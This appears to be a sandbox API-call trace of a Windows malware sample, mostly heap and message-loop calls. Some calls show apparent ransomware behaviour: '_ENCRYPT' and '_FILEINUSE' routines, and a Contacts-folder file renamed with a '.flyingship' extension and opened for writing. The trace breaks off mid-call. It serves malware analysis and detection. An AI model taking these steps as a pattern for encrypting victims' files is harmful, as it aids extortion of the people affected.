[0158.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0158.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1770 [0158.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0158.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0158.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0158.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0158.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd348 [0158.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0158.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0158.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0158.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0158.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0158.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0158.014] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0158.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0158.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0158.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0158.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0158.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0158.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0158.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0158.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0158.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0158.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0158.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0158.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0158.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0158.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0158.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0158.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0158.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0158.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0158.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0158.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0158.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0158.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0158.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0158.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0158.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0158.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0158.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0158.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0158.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0158.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0158.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0158.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0158.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ct", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="act", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ontact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="contact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".contact", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0158.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0158.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0158.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0158.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0158.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0158.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0158.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0158.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0158.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0158.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0158.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0158.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0158.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0158.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0158.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0158.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0158.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0158.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0158.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0158.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0158.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0158.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0158.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0158.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0158.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0158.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0158.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0158.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0158.017] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.018] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.018] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.018] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 0x90add8 [0158.018] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0158.018] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.018] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 0x90add8 [0158.018] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0158.018] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.018] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.019] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.019] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.019] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.019] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.019] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0158.019] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.019] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0158.019] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.019] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.flyingship.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0158.020] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.020] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.020] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.020] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.020] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.021] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.021] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0158.021] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.022] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.022] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.022] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.022] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0158.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ct", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="act", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ontact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="contact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".contact", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0158.022] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.022] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.022] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.022] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc95914e0, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xc95914e0, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc9603900, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x10b20, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Administrator.flyingship.contact", cAlternateFileName="ADMINI~2.CON")) returned 0x90add8 [0158.022] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0158.022] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.022] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc95914e0, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xc95914e0, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc9603900, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x10b20, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Administrator.flyingship.contact", cAlternateFileName="ADMINI~2.CON")) returned 0x90add8 [0158.023] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0158.023] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Contacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ontacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tacts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="acts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Administrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dministrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ministrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.024] CompareStringW (Locale=0x400, 